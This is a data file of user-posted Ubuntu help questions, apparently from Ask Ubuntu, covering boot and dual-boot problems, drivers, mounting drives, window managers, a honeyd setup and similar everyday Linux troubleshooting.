452326	ping to honeyd virtual host replying destination host unreachable	i have installed and am running honeyd and farpd successfully on ubuntu 13.10 . but , now the problem is : pinging the virtual host from honeyd host ( and from any other local network machine ) # ping ip_virtual_host output : destination host unreachable so , i took the following steps to try to find the problem : # nmap ip_virtual_host output : host seems down . but , it 's not really down . s , i ran it with -pn option . # nmap -pn ip_virtual host output : host is up . all 1000 ports scanned are filtered . so , i checked the ports from blocking . i flushed the iptables and created new rules allowing all incoming and outgoing traffic from honeyd host and virtual hosts . there is no hardware firewall . added `` set template_name tcp/udp/icmp default action open '' to honeyd.conf file for both virtual router and virtual hosts ( all open only for the time being ) . so , router rules also allow icmp traffic . after taking all these steps , i am still getting destination host unreachable on pinging my virtual hosts from honeyd host and local machines . and nmap is still giving output as mentioned in steps 1 and 2 . i am stuck after hours of searching and reading . please feel free to point out my mistakes . thanks in advance .
452327	kworker taking 100 % of one core	i updated from ubuntu 13.10 to 14.04 . i have a quad core , and one core is pegged at 100 % usage because of kworker . i know that kworker generally is doing things on behalf of the kernel , but i do n't know how to determine what the issue is . any help would be greatly appreciated .
452330	how can i get my graphics card to work ?	okay , so i have an old graphics card that i decided to use in another computer . the problem is , the computer does n't detect it . at all . in legacy mode , nope . uefi , nope . it does n't even switch over to it when automatically booting ubuntu in legacy mode . it stays on motherboard graphics . the graphics card is humming away , and has a 450w power supply ( 100 watts more than recommended for this card ) . tried : sudo lshw > hardware.011509 nano hardware.011509 it listed the pciex16 as empty . putting it in another motherboard , it worked . ( ubuntu , not windows ) ( same psu ) putting the bios in legacy mode . did not switch over to the card ( stayed on integrated graphics ) and did not detect it . turned off fast boot in windows , no change turned off secure boot , no change turned on load legacy oproms , and then enabled legacy boot mode . no change , still does n't work . there is no quick boot option in bios . please help ?
452332	failed to mount udf	i 'm on xubuntu 64 bit 14.04 . when i had windows 7 , i burnt a cd , it was like 4 months ago , now i need to open that cd in xubuntu , since i no longer have windows . solution 1 ( did n't work ) sudo apt-get install libudf0 solution 2 ( did n't work ) sudo chmod 777 /media ps : i wo n't try ashish 's solution unless someone confirms that it will work because mojo706 said that it did n't work . solution 3 ( did n't work ) âś sudo mount -t udf /dev/sr0 /cdrom mount : block device /dev/sr0 is write-protected , mounting read-only mount : /dev/sr0 : ca n't read superblock dmesg output
452335	unable to recognize and create partitions for ubuntu installation on dell inspiron 15r 5520	when i run the setup for 14.04 using the live usb and select `` something else '' for manually creating partitions on my hard disk , for some reason ubuntu is n't able to detect other partitions and assumes the entire hdd is unallocated . this is explained in the snapshot below : the description of the actual partitions are as under : c : ntfs 90gb ( running windows 7 ) d : ntfs 80gb g : ntfs 80gb h : ntfs 130gb free space : 85.66gb ubuntu is unable to identify these partitions . i have been dual booting ubuntu and windows for a while now and installed different versions of ubuntu over windows at least a dozen times , but never faced this issue . until recently , i was running 13.10 and upgraded to trust tahr . that 's when the problems began . the upgrade was successful , but once i rebooted i was n't able to log into ubuntu ( probably due to a change in the boot loader from legacy to uefi , which i am certain grub was supposed to handle , but whatever ! ) . one thing led to another and a re-installation attempt led to me having a single os on my laptop ( tahr ) and me losing all data . i removed tahr , re-installed windows 7 home premium and created the partitions . but now , i am unable to get ubuntu to identify the partitions and the right amount of free space . given below are snapshots that show the error message i get when gparted tries to detect my partitions . i am certain something is wrong with my partition table , but i do not know what it is or what the message really means . but this might be why ubuntu is unable to detect my partitions . windows 7 ( home premium ) disk management tool snapshot :
452337	failed to download repository information-xubuntu	i just installed xubuntu and i get this from the software center : failed to download repository information . check your internet connection . details : failed to fetch http : //ubuntu.tsl.gr/pool/universe/g/gnutls28/libgnutls28_3.2.11-2ubuntu1_i386.deb 404 not found failed to fetch http : //ubuntu.tsl.gr/pool/universe/liba/libav/libswscale2_9.11-2ubuntu1_i386.deb 404 not found
452339	dual-boot ( win7/14.04 ) / dual video card issue , monitor response inconsistent	after a couple years off i 've decided to go back to dual boot , mainly just for tinkering purposes . anyway , i 'm encountering a weird problem that hopefully you can help me with . i am running 2 x gtx 460 sli and experience the following behaviour . monitor plugged in to card # 1 : shows boot menu select ubuntu , boots great . select windows , screen goes black and remains black although i know it gets to windows login . no amount of fiddling will get the monitor to recognize the windows box as `` on '' . monitor plugged in to card # 2 : monitor remains black through boot process , can not see boot menu select ubuntu ( by timing it in my head ) , monitor remains black , even if i log in . select windows , screen remains black until it reaches the windows login screen , at which point it turns on . any idea what could cause this behaviour ? i have logged into windows and switched which card is the primary video card and the above behaviour remains the same regardless of the switch . really stumped on this one . any thoughts appreciated .
452340	what does the fdisk output mean	what does sudo fdisk -l mean ? this is the output . i installed win7 and ubuntu . using fdisk , i got four partitions . what does each partition mean ? which one is ubuntu ? which one is win7 ? thanks !
452345	how to automate sudo password	how do you input sudo password automaticly when prompted ? i can do this in a script by typing : echo password | sudo -s command , but how do i do that always when prompted ?
452349	lost windows 7 boot entry after installing grub customizer	the title says it all . i installed grub-customizer , made some changes to the gui , and lost my windows boot entries . i 've tried running sudo update-grub , but it did n't detect windows . how can i recover the boot option ?
452351	ubuntu book/pdf that could help learn the terminal	so guys iâm new in ubuntu world , right now i 'm running ubuntu 14.04 and i 'm actually enjoying it , i 'm coming from windows , so i want to ask u guys if there 's any ubuntu book/pd f that could help me learn the ubuntu terminal and their commands ! thanks in advance .
452360	can i install both the nokia n9 sdk and the ubuntu sdk ?	is it possible to install both the nokia n9 sdk and ubuntu sdk ? both use are based on qt , and i do n't know if the packages will clash and mess up my system .
452362	wine problem - wacom pressure not responding	i 'm a new ubuntu user , i 've tried fedora before for a couple of weeks on a friend 's pc and i fell in love with linux , i was told ubuntu was easier for linux new comers and that why i installed it : ) the thing is , on my friend 's pc ( fedora ) photoshop worked flawlessly with wacom , no pressure problems , on my ubuntu installation photoshop 's ( cs5 ) brushes does not work with pen pressure even when i can handle the pressure sliders on the ui , which it means the pen is recognized , but for some weird reason it does not operate . linux native apps like krita & gimp recognize and work perfectly with pen pressure , so my best guess it 's something on wine configuration i probably did wrong . i have been researching all night long but could n't get it to work , please do not tell me to switch to gimp to avoid the trouble , i use photoshop for working purposes and i really really need it ! ! thanks a lot for your help !
452365	how do i get an atheros ar9565 wireless adapter working ?	i have installed both windows 7 and ubuntu 12.04lts recently in my laptop hp d15-017tu . in windows 7 wifi works finely but not in the ubuntu . pls help me ... qca9565 / ar9565 wireless network adapter
452368	mdm is not saving session data .dmrc file	am trying to replace lightdm with mdm in 13.10 . am able to install and configure mdm , but when i go to login the system tells me that the .dmrc file is being ignored . initially there was no .dmrc file , but i copied one from another user . i moved that to my home directory and changed the permissions to 644 . this did n't solve the problem . i can confirm that my user owns $ home ; however , in the `` other '' section of the folder properties it says others can read/write .
452371	uninstaller for amd catalyst /usr/share/ati/amd-uninstall.sh , does not exist or can not be found	i am unable to uninstall the amd catalyst driver using the script specified by the amd instructions here . when i run the command : sudo ./amd-driver-installer-13.35.1005-x86.x86_64.run -- uninstall i get the error below : uninstaller for amd catalyst /usr/share/ati/amd-uninstall.sh , does not exist or can not be found how can i remove these drivers now ?
452373	libqt3-mt is not available in ubuntu 14.04	i need libqt-mt.so . * library files for a modem driver . but libqt3-mt package is not available in ubuntu repository . how can i get the .so files ? ? i also run the following command dpkg -s libqt-mt.so output dpkg-query : no path found matching pattern *libqt-mt.so*
452375	how to change file into folder ?	my folder desktop changed to file desktop ( without extension , 6mb ) . how can i turn it back ? i need that content .
452378	ubuntu vm sees a ghost bluetooth adapter ?	i am running ubuntu 12.04 in vmware on a windows 7 desktop . i do n't have any bluetooth adapters plugged into my desktop . before i insert any adapters , ubuntu sees an adapter called `` ubuntu-0 '' . when i plug my bluetooth dongle in , ubuntu sees a second bluetoother adapter , also named `` ubuntu-o '' . the first adapter ( which i dont think even exists ) does n't do anything . the only thing it does successfully is act as a decoy and takes over bluetooth commands from software ( i 'm writing a bluetooth app using pybluez ) . the second `` ubuntu-0 '' device , which corresponds to my bluetooth dongle , functions properly and finds my phone over bluetooth . why am i seeing this ghost adapter ? how do i get rid of this ghost adapter ? if there is any information i can provide to please let me know . i am new to ubuntu . thanks !
452380	network printer - incorrect configuration ?	i want to use a printer over my home network , but it fails . all the computers ( 3 ) with ubuntu 13.10 installed . hp-printer , hplip installed . the printer works fine on machines it is directly connected to . when i run the printer manager on the other computers , it is found correctly over the network and installed without any problem . when i send a document , printer page eternally working on `` obtaining printer configuration '' . when i open printer configuration again , properties , `` print test page '' , prompt : `` incorrect printer configuration ... '' i have tried connecting the printer to the different computers , but with similar results . any ideas what i could do ? greetings update : i have tried it also with another hp-printer and the same thing happens . during install get a message : `` broken tube '' ( or something like this ) . what does that mean ?
452381	unwanted keyboard shortcut after upgrade to 14.04	after upgrading to 14.04 from 13.10 , pressing the key `` a '' on the keyboard always started the file browser . after removing a duplicate file browser entry in the main menu ( via alacarte menu editor ) , pressing `` a '' always starts the disk usage analyzer . these shortcuts were never manually assigned to either application . they also do not show up in the keyboard shortcut settings . how can i get rid of these keyboard shortcuts ?
452382	14.04 dual boot/grub error	i 'm trying to install 14.04 along with windows7 ultimate on my old laptop , hp compaq nc8340 core2duo , 3gb , 750 gb harddisk . i installed windows 7 first , leaving around an unused partition of about 100 gb for ubuntu . i then installed ubuntu , but then when i reboot i get different kinds of grub errors , depending on what i tried last . i tried boot-repair as mentioned here : boot-repair ppa 404 error on ubuntu 14.04 i tried installing it as descibed here : dual boot ubuntu 13.10 and windows 7 these are the ones i bookmarked , i tried several other options . i now am the proud owner of several bootable usb sticks , with windows installer ( so i can restore a system image of a clean installed win7 ) , ubuntu 14.04 live image on usb , ubuntu 14.04 installed on an usb stick , gparted on a bootable usb stick , a supergrub iso on an usb stick , a copy of easybcd on my windows partition . i have several partitions on my hd : windows boot on sda1 windows 7 on sda2 extended partition on sda3 /boot on sda4 /swap sda5 / on sda7 i created sda 's 4 , 5 and 7 when installed ubuntu , but after installing it just wo n't boot . i just get : error : no suck partition entering rescue mode grub rescue > when i do a bootrec.exe /fixmbr , bootrec.exe /fixboot , bootrec.exe /rebuildbcd i can boot windows again . any help would be appreciated . i do n't mind wiping everything , but i prefer to keep windows where it is , as it took several hours to install all the updates . edit : log from boot-repair earlier today : http : //paste.ubuntu.com/7300051/
452384	connect 2 vga monitors for dual screen in ubuntu 12.04	i 'm trying to connect 2 vga monitors to my computer . my graphic card is an nvidia geforce gtx660 and i 'm working with ubuntu 12.04 . i have one connector dvi-i to vga and one dvi-d to vga to connect the 2 monitors to the dvi ports of my graphics card . in the nvidia x server settings i can see that both monitors are enabled . but one of them is not running . both monitors are running ok when plugged solely to the dvi-i connection of the graphics card . the monitors have different resolution , 1600x900 and 1280x1024 but the second one is the one that is not running ( this is connected to the dvi-d port ) with xrandr however i get this : xrandr screen 0 : minimum 8 x 8 , current 1600 x 900 , maximum 16384 x 16384 dvi-i-0 connected primary 1600x900+0+0 ( normal left inverted right x axis y axis ) 443mm x 249mm 1600x900 60.0*+ 1280x800 59.8 1280x720 60.0 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-0 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) i know it can be drivers or even hardware related but i would like to get a clue on how to investigate this further from ubuntu . thanks in advance
452385	lightdm is missing gnome shell icon	the icon of gnome shell is missing from lightdm.. i had to manually add gnome shell to lightdm because it did n't install properly on my machine . now i do n't now how to add the icon to lightdm . im on ubuntu 14.04
452386	how to change keyboard shortcuts ?	i 'm new to linux and i 'm having trouble with ubuntu 14.04 keyboard shortcuts like alt+tab to switch between applications and alt+shift to change the keyboard layout.. anyone can help please ?
452387	ca n't boot in windows 8 after upgrade to 14.04	as advised i am asking here about my problem . after upgrade to ubuntu 14.04 i ca n't boot in windows 8.1 . right away after upgrade i noticed that few of my previous options are missing in grub . then i tried booting in ubuntu and it works . but booting windows does n't . i only get error reading file for less than a second and than it returns me back in grub . i tried boot-repair with live cd in ubuntu 13.10 as advised . it ran through and it give me this http : //paste.ubuntu.com/7299246/ . i would be really grateful if someone would check it and tell me if something is wrong . or give some advice .
452388	cisco vpn .pcf profile ca n't be imported in ubuntu 14.04	first import attempt after fresh installation of network-manager-vpnc failed with ubuntu 14.04 has experienced an internal error screen . i have tried to restart network-manager-vpnc and computer , import now fails without any error message .
452389	how to create facebook webapp ?	i 'm migrating from mac to ubuntu linux ( 14.04 ) . i 've read that there are a number of 'web apps ' that encapsulate frequent and common web applications into kind-of standalone units known as 'webapps ' . i 've got the twitter one sitting in my unity launcher right now . it 's very handy . i 've seen mentions for a similar facebook webapp but i can find it nowhere . intensive googling has served me no good . can anyone point me in the correct direction ? if for some reason it has ceased to exist , how can i create a similar thing ? ( i 'm running chrome as my default browser . i tried adding facebook as an app to chrome and creating a desktop icon , but unfortunately that opens as a window under chrome and does not give it it 's own icon in the unity launcher sidebar , as i desire . ) thanks to anybody who can help me out with this .
452390	dual boot ubuntu 14.04 with windows 8	i 'm attempting to dual boot win8 and ubuntu 14.04 lts . i already had win8 installed and have ubuntu installed , and when booting i am given the option to boot either win8 or ubuntu , but when i click ubuntu it gives me an error `` \nst\autoneogrub0.mbr '' . i then mounted boot repair to a usb flash drive and tried to run it , but it had to abort and gave an `` efi detected '' error . the link that boot repair gave is here http : //paste.ubuntu.com/7302051/ .
452392	bash script callable from home but not scripts directory	i 'm having a very weird error when trying to make a script callable . i have a scripts directory in /srv/projectname/scripts where i store you know scripts to be called as cron jobs for different projects . i 'm trying at add a new one and seeing very weird behavior . in debugging i reproduce it using this set of commands from /srv/projectname/scripts create a file create a file vi helloworld.sh insert text exactly : # ! /usr/bin/env bash echo `` hello world ! '' make the script executable and try to call it : chmod +x helloworld.sh ./helloworld.sh which gives : -bash : ./helloworld.sh : permission denied make sure there is n't a code error : bash helloworld.sh which gives : hello world ! copy the script to home and call it : cp helloworld.sh ~/helloword.sh ~/helloword.sh which gives : hello world ! i have no idea what is going on . i have tried a lot of variants where i give the full path , same error , or if i sudo which gives no error , but also does n't print `` hello world ! '' . other details : running on : ubuntu 12.04.4 lts i have also noticed that i ca n't tab-complete to the full name of a script that gives me this error , but i can once i have moved it . the directory /srv/projectname is a git repo but this script has n't been added to it yet , i because i usually only do that once its working yet . ls -l lines for the script and scripts directory are -rwxrwxr-x 1 ubuntu ubuntu 41 apr 21 20:25 helloworld.sh drwxrwxr-x 3 ubuntu ubuntu 4096 apr 21 20:25 scripts respectively any help would be awesome . edit : gilles had the answer . to save anyone else who has this problem a google search . sudo mount /srv/projectname/ -o remount reloads the edited fstab , and everything works again .
452396	what is unknown display in system display	what is the usage of unknown display in the system settings -- - > display , which is shown next to mirrored display on 14.04 ubuntu . i disable that in order to my mouse corsor blink mouse cursor blink on 14.04 live on cool drive
452397	two docky panels as duplicates . ( muti-monitor )	does docky support two docks that will display all window icons as well as all launchers , preferably with both docks having the same icon order , just one on each desktop ?
452398	lxc trusty ( ubuntu 14.04 ) network interface is not starting	my host environment is ubuntu 12.04 lts . i have created ( as root ) a container as follows : lxc-create -n bitshares2 -t ubuntu -- -- release trusty i first start as a daemon lxc-start -n bitshares2 -d then attach using lxc-attach -n bitshares2 . once in the trusty container i see there is no network access . other container 's are precise ( ubuntu 12.04 ) and work just fine using the start/attach method . i reproduced this problem on two ubuntu 12.04 hosts . update : the network interface was down . this is a manual fix for the problem : ifup eth0 guide : https : //help.ubuntu.com/lts/serverguide/lxc.html is this a bug in the template ?
452400	tqslcert wo n't load my tq6 certificate	i have installed ubuntu on my xp workshop desktop pc . i installed trustedqsl from the ubuntu software center . however tqslcert does n't manage the tq6 certificate that i used in xp . how do i get a p12 certificate ?
452402	ubuntu 14.04 locks screen without dimming during fullscreen video playing ?	i upgraded from 13.10 to 14.04 yesterday , and it appears that something has changed concerning how screen dimming works during fullscreen video playback . this problem does not occur during video playback from my hdd , as the computer does not lock itself while i am doing that . this issue only occurs when streaming videos over the internet . formerly , in 13.10 , the screen would dim , which was a good warning for when i needed to remind the computer i 'm still there . however , the screen no longer does this . instead , it immediately locks itself at the predetermined time . the screen dims normally when i am not watching a video fullscreen . is this an issue new to 14.04 or is it something i switched in my computer somewhere ? i checked the settings , and the dim screen option is still on . thank you for any assistance . i realize that i can just set the computer not to lock itself , but i 'd have to set it for half an hour , and i do n't want to forget i did so , and leave the computer vulnerable that long .
452403	attempting to install ubuntu on windows 7	i am attempting to install ubuntu on windows 7 . i followed these instructions here . i see the files for ubuntu desktop on the flash drive . however , restarting will not make the application run , nor will hitting the f12 key . i tried to run the app as administrator , but it gives me a reboot , reboot from cd , and reboot later option , the first two not working . thanks in advance for your help . p.s . i got into the bios by hitting f10 repeatedly ( this is an hp laptop ) . i changed the boot order and booted from the flash drive . however i got stuck in some kind of loop . every time i connected to the wifi and hit install ubuntu within windows 7 , ubuntu would run for while ( the dots would cycle through ) then the wifi would get disconnected and i would be back at the prompt : do you want to install ubuntu within windows 7 , etc . i have gone through this cycle several times , and i even clicked the `` i do n't want to connect to the internet now '' option , which was my last choice , and then i chose `` try ubuntu '' instead of `` install ubuntu '' . i am able to get to firefox and write what is happening now .
452404	how to fix/restart/continue broken/stopped upgrade	did 2 test upgrades from server . on 1 changed in /etc/apt/sources.list text precise to trusty sudo apt-get update & & sudo apt-get upgrade all is fine on 2 did sudo apt-get update sudo apt-get upgrade do-release-upgrade -d then when it was going i wanted to see what differences are in theese configuration files . so i pressed d & didnt know how to exit it so i did crtl+x witch exited whole upgrade . now apache isnt starting . how to continue or start again upgrade ?
452407	need help mounting a drive	hi all i 'm sorry if this question has already been asked i 've searched over and over but have n't found anything . i 'm new to ubuntu and just downloaded it today because i 've been trying to salvage a hd from my laptop i ca n't access through windows . unlike windows i can see the drive but when i try to open it i get this error message . error mounting /dev/sdb2 at /media/liz/ti106401w0d : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/liz/ti106401w0d '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read $ upcase , unexpected length ( -1 ! = 131072 ) . failed to mount '/dev/sdb2 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . if someone could walk me through on how to fix this i would appreciate it . i really need to get the files off this drive ( business files ) as they 're very important so a simple format is n't an option . thanks ! ! !
452408	what happened to my midi device files ?	i 've been working on a personal project which involves parsing a binary stream of midi data from a controller . the way i had been doing it was reading from /dev/dmmidi1 . over the weekend i upgraded from kubuntu 12.04 to kubuntu 14.04 . now , when i plug in my midi controller , there are no device files that look like ones that would correspond to my controller . when i run aplaymidi -l , the output shows the device that i expect . why am i not seeing device files ?
452411	revert from gnome 3 to unity	ok , so ubuntu 14.04 came with gnome 3 in it 's repo and i tried to give it a go , and i did n't like it at all . so i wanted to continue to use unity desktop , but it kept freezing and i could n't change background . right click also is n't working on desktop . is there a way to delete all of gnome 3 and reinstall unity like it would be after fresh install ?
452412	game ca n't connect to internet via winetricks/playonlinux	hi i have a problem with the game world of warcraft , which i installed via wine , winetricks and playonlinux . the game runs , but wo n't connect to the server . what can i do to solve this ?
452413	user account password	i created an account for a standard user and assign a password . i login as standard user and try to change standard user password and realize that it needs admin user rights to change user password . i just wanted to know is it possible to create a standard user and let standard user to change his or her password by himself or herself ? your information and help is great appreciated , regards , inung
452416	maple 15 on ubuntu 12.04.3 lts 32-bit	i have installed maple 15 on ubuntu 12.04.3 lts . however , when i click on minimize i can not restore the windows and have to launch another session of maple which is frustrating . i think it may not be installed properly since at that time i did not have some of the dependencies . also when i launch it there is not a small arrow point at it on the launcher as the other applications . furthermore , it also created a desktop shortcut on the desktop of the root account . in my opinion reinstalling is not a viable option as this might cause problems with licensing since i already have a copy installed and working on windows . any help on the matter is appreciated . p.s : i have installed the program from the binaries available on the website of the producer . the desktop environment used is unity .
452421	i can only see one computer in the network , why is that ?	i 've installed ubuntu on one machine and would like to connect to other windows computers in the same network . on a windows comnputer i can see several machines but on my ubuntu computer i can only see one , why is that ? how can i fix this problem ?
452422	ubuntu 14.04 lockscreen turns of music + does play 'lock-sound '	my computer automatically locks its screen ( as its supposed to do ) after the 30 seconds that i 've asked for in the lock screen settings menu . since upgrading from the 13.10 to the 14.04 system , the lock screen makes the `` padum '' sound ubuntu does when showing the login-screen . next to this , music ( like rhythmbox ) wo n't keep playing while 'on ' the lockscreen , while i 'd like it to do so . instead , it pauses it till i unlock my computer , and starts directly playing again after that . how to i turn of the `` welcome to the login screen '' chime , and make sure the music keeps on playing ? i 'm running ubuntu 14.04 , 64 bits , with the gnome desktop . would this be the same bug ? ( seeing that i do not run xubuntu ) https : //bugs.launchpad.net/ubuntu/+source/light-locker/+bug/1296456 update : after some tweaks i 've seem to have fixed my issue . there are two lock-screen-settings in gnome 14.04 . 1 : brightness & lock from system settings , and 2 : light locker settings . my brigtness & lock are set on : '' turn screen off when inactive for 2 minutes '' + `` lock = on '' + `` lock screen after screen turns off '' + `` require my password when waking from suspend '' is checked . light locker settings are set on : screensaver , blank screen after `` never '' . switch off display after `` never '' . enable light-locker `` off '' . automatically lock the session `` never '' . lock on suspend `` off '' . now the computer locks without `` padum '' sound and music keeps on playing while on lock .
452426	how can i combine the find command with other commands so i do n't have to navigate to the folder ?	sometimes i want to run certain files , but i do n't want to navigate all the way to the folder . if i know the file name and find -name file_name.py only returns one result , can i just use that ? for example , instead of navigating all the way to a specific folder and calling : python file_name.py can i write : python [ find -name file_name.py ] or python [ locate file_name.py ] or some sort of variant for 'search my entire computer for this file name and use it ' ? preferably in one line .
452427	fresh install of 12.04 , boot problem after updates	this desktop has a hardware raid , for which the bios settings is `` legacy . '' fresh install . then , when i enter the following command : sudo apt-get update update happens . the computer runs fine . then i reboot : sudo reboot the computer fails to reboot . this has been repeated and is a persistent problem . why ? this is so frustrating .
452429	image file type associations and sorting	unbuntu 14.04 . just upgraded from 12 when downloading images from camera ( raw+jpg basic ) in file viewer it associates both nef and jpg as image types.my workflow first action was to separate jpgs into a sub folder . to do this i used to sort on type . 14.04 seems to see them both as image types now tho . so i cant simply sort , highlight all jpg and move to another folder . is there a way to associate nef with a different `` type '' . so i can sort again using this technique ?
452430	how can i fix dolphin 's slow start up ?	i 've been a user of kubuntu for 2 years now and i 've upgraded the system when a new version came out . so far i was fine , but now with the kubuntu 14.04 lts upgrade and the kde 4.13 also updated i found a very annoying problem : the file manager dolphin takes an eternity to be functional . when you open it , it comes out quickly but then it does n't respond for as long as a minute . when finally works it 's all fine , but if i close it and reopen it , it happens again . i tried launching dolphin from the terminal , and this is what it came out . santiago @ santiago-pc : ~ $ dolphin object : :connect : no such signal org : :freedesktop : :upower : :deviceadded ( qdbusobjectpath ) object : :connect : no such signal org : :freedesktop : :upower : :deviceremoved ( qdbusobjectpath ) bus : :open : can not get ibus-daemon 's address . ibusinputcontext : :createinputcontext : no connection to ibus-daemon qpixmap : :scaled : pixmap is a null pixmap dolphin ( 2841 ) /kdecore ( k*timezone* ) : ksystemtimezones : ktimezoned initialize ( ) d-bus call failed : `` did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . '' i never had problems with the startup speed in my previous upgrades , but since 14.04 it 's really slow . i also noticed that it 's only dolphin , since gwenview and other kde-related programs run just fine . i hope i made myself clear ( sorry for the language , i 'm from argentina ) , and really hope anybody can help me . if you might need any other information please tell me and i 'll provide it as quick as i can . thanks in advance , have a nice day .
452436	12.10 error upon bootup and upgrade	i upgraded to 12.10 in my quest to get to 14.04 , but my computer ( hp pavilion dv 6c47cl ) does n't seem to like 12.10 . it wo n't load to the gui , and so i am forced to go to the command line if i want to load ubuntu at all ( and it still wo n't go to command line with startx ) . i have tried upgrading from command line with the following commands : 1 ) sudo do-release-upgrade ( reports no new release found ) 2 ) sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade ( this will start trying , but will ultimately fail because it encountered an error while processing , was unable to open a file , or some other reason ) now whenever i run sudo apt-get dist-upgrade i get dpkg : error processing /var/cache/apt/archives/xserver-common_2 % 3a1.13.3-0ubuntu6.2_all.deb ( -- unpack ) : trying to overwrite '/var/lib/xkb/readme.compiled ' , which is also in package xserver-common-lts-raring 2:1.13.3-0ubuntu6~precise3 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/xserver-common_2 % 3a1.13.3-0ubuntu6.2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any advice on things i can try to make the upgrade happen ?
452441	scrolling with a touchscreen 14.04	i am having trouble configuring the touchscreen on my asus n550jv to scroll with one finger in web browsers , office applications , etc on ubuntu 14.04 . oddly , scrolling works in the settings apps and a handful of other preinstalled apps . any suggestions ? thanks flannabhra
452442	empathy not connecting outlook/live on ubuntu 14.04	my gmail account works fine , but my live account simple does n't login using empathy , the circle of dots keeps moving , moving , and nothing , my live contacts does n't shows up . both accounts have 2-step verification , but i put the code in the window and everything in the setup was ok , the only problem is that my account actually never `` login '' . i gave permission to both in the setup , everything was ok. what 's the problem ?
452445	launcher icons stop working on ubuntu 14.04	i have the problem that sometimes my launcher icons will get left-click-unresronsive . right click will open the context menu , though . starting applications via the hud works fine , but the launcher icons seem to freeze . even when an application is running , i ca n't get it to the front by clicking on the launcher . for info : one customization i made is replacing nautilus with nemo as the default file explorer .
452447	laptop no longer boots correctly after installing 13.10	i have a lenovo y400 with nvidia gt 750m graphics card . i installed ubuntu 13.10 . the installation was not a problem and everything seemed to work until i had to restart it . during boot up , it shows the full lenovo logo for a second , then part of the logo gets cut , only showing `` novo '' . it stays like this for a minute and then changes to a purple screen . as far as i know , this purple screen lasts forever . the only thing that affects it is if i do ctrl alt delete . it then just goes back to the lenovo logo and repeats . i had my system successfully dual booting with 13.10 before until the update to 14.04 caused problems . i decided to reinstall 13.10 and everything got messed up .
452448	dwm patches not working	im trying to install this dwm patch but i keep getting this error ps im running a vanilla dwm-6.0 with only minor edits to config.h to change the tags ca n't find file to patch at input line 3 perhaps you used the wrong -p or -- strip option ? the text leading up to this was : -- -- -- -- -- -- -- -- -- -- -- -- -- | -- - dwm.c.orig 2012-05-08 22:32:33.883110400 +0200 |+++ b/dwm-6.0/dwm.c 2012-05-08 22:35:59.353105670 +0200 -- -- -- -- -- -- -- -- -- -- -- -- -- file to patch : dwm.c patching file dwm.c hunk # 2 succeeded at 284 ( offset -12 lines ) . hunk # 3 succeeded at 479 ( offset -12 lines ) . hunk # 4 succeeded at 1353 ( offset -55 lines ) . hunk # 5 succeeded at 1721 with fuzz 2 ( offset -68 lines ) . hunk # 6 failed at 2240 . 1 out of 6 hunks failed -- saving rejects to file dwm.c.rej so i 'm not sure whats up with it .
452450	confused deputy problem	why are capabilities sufficient to solve the confused deputy problem while acls are not ? after some research , the extent of my understanding is as follows : acls can be changed by users with proper permissions while capabilities are controlled by the os making them safer . the acl is checked when a file is accessed , while the capability is passed with the request being made . this makes the following scenario possible : if r has root access , and b wants to change a 's password , b would ask r to do so . while the /etc/passwd file shows that r can modify it , since the capabilities of b are the ones being passed in and show otherwise , the action wo n't take place . am i missing something ? if not , i do n't see the purpose of acls if capabilities will always provide the same information but with higher integrity .
452451	backup from 13.10 fails to restore in 14.04	i had 13.10 and i did a backup with deja-dup of my music , videos , and document folders and saved it to an external drive . i then wiped my drive clean and ran a fresh install with 14.04 now when i try to restore i get the following ( below ) . failed with an unknown error : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1494 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1488 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1337 , in main do_backup ( action ) file `` /usr/bin/duplicity '' , line 1370 , in do_backup globals.archive_dir ) .set_values ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 697 , in set_values self.get_backup_chains ( partials + backend_filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 819 , in get_backup_chains map ( add_to_sets , filename_list ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 809 , in add_to_sets if set.add_filename ( filename ) : file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 100 , in add_filename ( self.volume_name_dict , filename ) assertionerror : ( { 1 : 'duplicity-full.20140419t005410z.vol1.difftar.gz ' } , 'duplicity-full.20140419t005410z.vol1.difftar.xz ' )
452454	amd driver installer without text	i am trying to install amd drivers on my dell inspiron 15r . i downloaded beta drivers from here . i extracted the the downloaded zip file . then i executed amd-driver-installer-14.10-x86.x86_64.run . now the installer comes up , but it does n't show any text in it .
452455	xorg errors with alt . window manager	i 'm currently trying to use the bspwm window manager , by following this guide . i have all the correct dependencies installed , and i compiled it correctly without any errors . the problem comes when actually executing it . i tried both using the lightdm way the tutorial shows , as well as killing lightdm and adding sxhkd & exec bspwm to my .xinitrc ( yes , this is the correct way to launch it like this ) , and running startx from the tty . in lightdm , it just immediately logs me out , and when i launch xorg from a tty , it goes through the normal verbose , but instead of suspending and loading the wm , it says `` failed to connect to x server '' , and exits , while any other window manager i try this way works fine . has anyone had any issues like this , either with bspwm or a different window manager , and do you know how to fix it ? i am using ubuntu 12.04
